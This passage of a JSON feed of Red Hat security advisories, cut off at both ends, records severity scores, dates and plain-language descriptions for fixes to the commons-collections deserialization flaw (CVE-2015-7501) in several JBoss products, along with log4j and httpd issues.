"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T18:21:01", "type": "redhat", "title": "(RHSA-2015:2501) Critical: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:07", "id": "RHSA-2015:2501", "href": "https://access.redhat.com/errata/RHSA-2015:2501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BPM Suite 6.1.0 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-08T16:09:43", "type": "redhat", "title": "(RHSA-2015:2579) Critical: Red Hat JBoss BPM Suite 6.1.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2015:2579", "href": "https://access.redhat.com/errata/RHSA-2015:2579", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets.\n\nSecurity Fix(es):\n\n* It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-06-08T07:23:59", "type": "redhat", "title": "(RHSA-2017:1417) Important: rh-java-common-log4j security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2017:1417", "href": "https://access.redhat.com/errata/RHSA-2017:1417", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T04:45:33", "type": "redhat", "title": "(RHSA-2015:2522) Important: apache-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-11T23:32:50", "id": "RHSA-2015:2522", "href": "https://access.redhat.com/errata/RHSA-2015:2522", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0, 6.1.0 and 6.2.0 as\nprovided from the Red Hat Customer Portal are advised to apply this\nsecurity update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T19:05:01", "type": "redhat", "title": "(RHSA-2015:2534) Critical: Red Hat JBoss Data Virtualization 6.0.0, 6.1.0, and 6.2.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:07", "id": "RHSA-2015:2534", "href": "https://access.redhat.com/errata/RHSA-2015:2534", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T22:41:49", "description": "The Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nSecurity Fix(es):\n\n* apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-19T09:11:45", "type": "redhat", "title": "(RHSA-2020:4274) Important: rh-maven35-apache-commons-collections4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-10-19T09:34:27", "id": "RHSA-2020:4274", "href": "https://access.redhat.com/errata/RHSA-2020:4274", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss SOA Platform 5.3.1 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-25T20:36:54", "type": "redhat", "title": "(RHSA-2015:2516) Critical: Red Hat JBoss SOA Platform 5.3.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:57", "id": "RHSA-2015:2516", "href": "https://access.redhat.com/errata/RHSA-2015:2516", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BRMS 6.1.0 as provided from the Red\nHat Customer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-08T16:09:30", "type": "redhat", "title": "(RHSA-2015:2578) Critical: Red Hat JBoss BRMS 6.1.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:26", "id": "RHSA-2015:2578", "href": "https://access.redhat.com/errata/RHSA-2015:2578", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of rh-java-common-apache-commons-collections are advised to\nupgrade to these updated packages, which contain a backported patch to\ncorrect this issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:2523) Important: rh-java-common-apache-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-12T21:28:21", "id": "RHSA-2015:2523", "href": "https://access.redhat.com/errata/RHSA-2015:2523", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Portal is the open source implementation of the Java EE suite\nof services and Portal services running atop Red Hat JBoss Enterprise\nApplication Platform.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw can be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Portal 6.2.0 as provided from the Red Hat\nCustomer Portal are advised to install this security patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T20:22:06", "type": "redhat", "title": "(RHSA-2015:2537) Critical: Red Hat JBoss Portal 6.2.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:40", "id": "RHSA-2015:2537", "href": "https://access.redhat.com/errata/RHSA-2015:2537", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T20:21:51", "type": "redhat", "title": "(RHSA-2015:2536) Critical: Red Hat JBoss Enterprise Application Platform 6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:41:56", "id": "RHSA-2015:2536", "href": "https://access.redhat.com/errata/RHSA-2015:2536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat\nEnterprise Linux 4, 5, and 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T00:00:00", "type": "redhat", "title": "(RHSA-2015:2535) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:37:44", "id": "RHSA-2015:2535", "href": "https://access.redhat.com/errata/RHSA-2015:2535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Data Grid is a distributed in-memory data grid, based on\nInfinispan.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Data Grid 6.4.1 and 6.5.1 as provided from\nthe Red Hat Customer Portal are advised to install this security patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T18:21:14", "type": "redhat", "title": "(RHSA-2015:2502) Critical: Red Hat JBoss Data Grid 6.4.1 and 6.5.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:57", "id": "RHSA-2015:2502", "href": "https://access.redhat.com/errata/RHSA-2015:2502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BRMS 5.3.1 as provided from the Red Hat Customer\nPortal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-18T21:10:10", "type": "redhat", "title": "(RHSA-2015:2670) Critical: Red Hat JBoss BRMS 5.3.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:08", "id": "RHSA-2015:2670", "href": "https://access.redhat.com/errata/RHSA-2015:2670", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "JBoss Operations Network provides an integrated solution for managing\nJBoss middleware, other network infrastructure, and applications built\non Red Hat Enterprise Application Platform (EAP). The Apache Commons\nCollections library provides new interfaces, implementations, and\nutilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.2.3 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-04T16:53:21", "type": "redhat", "title": "(RHSA-2015:2547) Critical: Red Hat JBoss Operations Network 3.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:08", "id": "RHSA-2015:2547", "href": "https://access.redhat.com/errata/RHSA-2015:2547", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe following packages have been upgraded to a later upstream version: httpd24-httpd (2.4.27). (BZ#1461819)\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\nBug 